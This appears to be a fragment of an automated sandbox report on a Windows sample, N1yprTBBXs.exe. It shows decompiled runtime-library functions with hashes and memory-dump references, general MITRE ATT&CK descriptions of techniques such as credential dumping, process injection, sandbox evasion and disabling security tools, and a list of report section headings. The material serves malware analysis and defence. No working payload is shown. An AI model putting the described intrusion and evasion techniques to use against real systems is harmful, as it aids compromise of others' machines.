0x00b154ef
0x00000000
0x00b154f1
0x00b154f1
0x00000000
0x00b154f1

APIs

__lock.LIBCMT ref: 00B154BE

Part of subcall function 00B13C3D: __mtinitlocknum.LIBCMT ref: 00B13C53
Part of subcall function 00B13C3D: __amsg_exit.LIBCMT ref: 00B13C5F
Part of subcall function 00B13C3D: EnterCriticalSection.KERNEL32(?,?,?,00B1754D,00000004,00B1DEC8,0000000C,00B15589,00000000,?,00000000,00000000,00000000,?,00B1334F,00000001), ref: 00B13C67

___sbh_find_block.LIBCMT ref: 00B154C9
___sbh_free_block.LIBCMT ref: 00B154D8
HeapFree.KERNEL32(00000000,00000000,00B1DE48,0000000C,00B13C1E,00000000,00B1DD68,0000000C,00B13C58,00000000,?,?,00B1754D,00000004,00B1DEC8,0000000C), ref: 00B15508
GetLastError.KERNEL32(?,00B1754D,00000004,00B1DEC8,0000000C,00B15589,00000000,?,00000000,00000000,00000000,?,00B1334F,00000001,00000214), ref: 00B15519

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 091ab3e0bd5203afd4ee492bf42b5b65759865d43383e0c8449e43beb9290323
Instruction ID: 1e31e2958f1c4eeb18aedd115d668bef2d1fe812235c2296b651c29a94e55e92
Opcode Fuzzy Hash: 091ab3e0bd5203afd4ee492bf42b5b65759865d43383e0c8449e43beb9290323
Instruction Fuzzy Hash: D2016271D01706EADB306BB49C0A7DE7BE6DF50721FE04089F504A6195EF388AC1CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00B11071, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B11071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				void* _t25;

				_t25 = __edi;
				if(E00B11C70(__edi, "udp") == 0) {
					if(E00B11C70(__edi, "tcp") == 0) {
						if(E00B11C70(__edi, "any") == 0) {
							goto L9;
						} else {
							 *__esi = 0x100;
							goto L6;
						}
					} else {
						 *__esi = 6;
						goto L6;
					}
				} else {
					 *__esi = 0x11;
					L6:
					if(E00B11C70(_t25, ":") == 0) {
						L9:
						return 0;
					} else {
						_v8 = _v8 & 0x00000000;
						_t11 = E00B11FD7(_t9 + 1,  &_v8, 0xa);
						if(_t11 == 0) {
							goto L9;
						} else {
							 *_a4 = _t11;
							return 1;
						}
					}
				}
			}

0x00b11071
0x00b11084
0x00b1109d
0x00b110b6
0x00000000
0x00b110b8
0x00b110b8
0x00000000
0x00b110b8
0x00b1109f
0x00b1109f
0x00000000
0x00b1109f
0x00b11086
0x00b11086
0x00b110be
0x00b110cd
0x00b110f1
0x00b110f4
0x00b110cf
0x00b110cf
0x00b110db
0x00b110e5
0x00000000
0x00b110e7
0x00b110ea
0x00b110f0
0x00b110f0
0x00b110e5
0x00b110cd

APIs

__wcstoui64.LIBCMT ref: 00B110DB

Strings

any, xrefs: 00B110A7
tcp, xrefs: 00B1108E
udp, xrefs: 00B11075

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcstoui64
String ID: any$tcp$udp
API String ID: 3882282163-1470427579
Opcode ID: 2a0a5bfce2ed033b3894354778965294f198ea69b0d5befc43cb6e90c2104c48
Instruction ID: e774be968f81b70c866a97f377e934a166828d73b4b683590b5481742f3d34ec
Opcode Fuzzy Hash: 2a0a5bfce2ed033b3894354778965294f198ea69b0d5befc43cb6e90c2104c48
Instruction Fuzzy Hash: 78018436A5834266E714AB289C07BF622D8CF06764FA0089DFB41D90C1EFF5D8C09269

Uniqueness

Uniqueness Score: -1.00%

Function 00B19110, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00B19110() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0xb1d320;
					_v28 =  *0xb1d318;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00b19115
0x00b1911d
0x00b19134
0x00b190e0
0x00b190e9
0x00b190f5
0x00b190f8
0x00b190fb
0x00b190fd
0x00b19100
0x00b19105
0x00b1910f
0x00b19107
0x00b1910b
0x00b1910b
0x00b1911f
0x00b19125
0x00b1912d
0x00000000
0x00b1912f
0x00b1912f
0x00b19133
0x00b19133
0x00b1912d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00B184A4), ref: 00B19115
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00B19125

Strings

KERNEL32, xrefs: 00B19110
IsProcessorFeaturePresent, xrefs: 00B1911F

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 867ce9b166959e218e6507b75e17680145a25d67fad39fe4f363c0129542e802
Instruction ID: 63d36f288a0927e719b9c097c3d1a9e43d7ef75d7e067355ad7e786a2cb6e9ba
Opcode Fuzzy Hash: 867ce9b166959e218e6507b75e17680145a25d67fad39fe4f363c0129542e802
Instruction Fuzzy Hash: 13F03030A40A0AE2DF101BA5BC1E6EEBFB9FB84B46FC205D0A191F10D4DF7481F49246

Uniqueness

Uniqueness Score: -1.00%

Function 00B18FFC, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B18FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00B188ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00B189DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00B18F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00B18E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00b19001
0x00b19007
0x00b1907a
0x00000000
0x00b1900e
0x00b1900e
0x00b19011
0x00b1902c
0x00b1902f
0x00b1904f
0x00b19061
0x00b19031
0x00b19031
0x00b19034
0x00000000
0x00b19036
0x00b19048
0x00b19048
0x00b19034
0x00b1907f
0x00b19083
0x00b19013
0x00b1902b
0x00b1902b
0x00b19011

APIs

__cftof_l.LIBCMT ref: 00B19022

Part of subcall function 00B18E47: __fltout2.LIBCMT ref: 00B18E73

__cftog_l.LIBCMT ref: 00B19048
__cftoe_l.LIBCMT ref: 00B1907A

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 244f530c6a52381af98145142a3fcd80778d9e56dd8f8a8c704909be5c423a0d
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 8E114E7200018ABBCF265E94CC55CEE3FA7FB1C350B988595FA1899031C736C9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B13060, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B13060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0xb1dcf8);
				E00B13F70(__ebx, __edi, __esi);
				_t28 = E00B1339D(__ebx, __edi, _t30);
				_t13 =  *0xb1f534; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E00B13C3D(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0xb1f618; // 0xb1f540
					 *((intOrPtr*)(_t29 - 0x1c)) = E00B13022(_t8, _t25, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E00B130CA();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00B1339D(_t22, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00B12033(_t25, _t26, 0x20);
				}
				return E00B13FB5(_t28);
			}

0x00b13060
0x00b13060
0x00b13060
0x00b13060
0x00b13060
0x00b13062
0x00b13067
0x00b13071
0x00b13073
0x00b1307b
0x00b1309f
0x00b130a1
0x00b130a7
0x00b130ab
0x00b130ae
0x00b130b9
0x00b130bc
0x00b130c3
0x00b1307d
0x00b1307d
0x00b13081
0x00000000
0x00b13083
0x00b13088
0x00b13088
0x00b13081
0x00b1308d
0x00b13091
0x00b13096
0x00b1309e

APIs

__getptd.LIBCMT ref: 00B1306C

Part of subcall function 00B1339D: __getptd_noexit.LIBCMT ref: 00B133A0
Part of subcall function 00B1339D: __amsg_exit.LIBCMT ref: 00B133AD

__getptd.LIBCMT ref: 00B13083
__amsg_exit.LIBCMT ref: 00B13091
__lock.LIBCMT ref: 00B130A1

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 7960eca0f79954ed3d0d1189524cf01c0a3daa6f63df8494245885f9ddde0c6b
Instruction ID: 4408a18b3fbcf413dde814621a9d83a34070dcc66352fb0fd9fbc17009300b90
Opcode Fuzzy Hash: 7960eca0f79954ed3d0d1189524cf01c0a3daa6f63df8494245885f9ddde0c6b
Instruction Fuzzy Hash: 1AF01D32940700CAD720AB74940E7DD73E0AF04F11FD045D9A4A4972D6EB745BC1CB95

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Browser extensions, File monitoring, Process monitoring, Process use of network, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report N1yprTBBXs.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre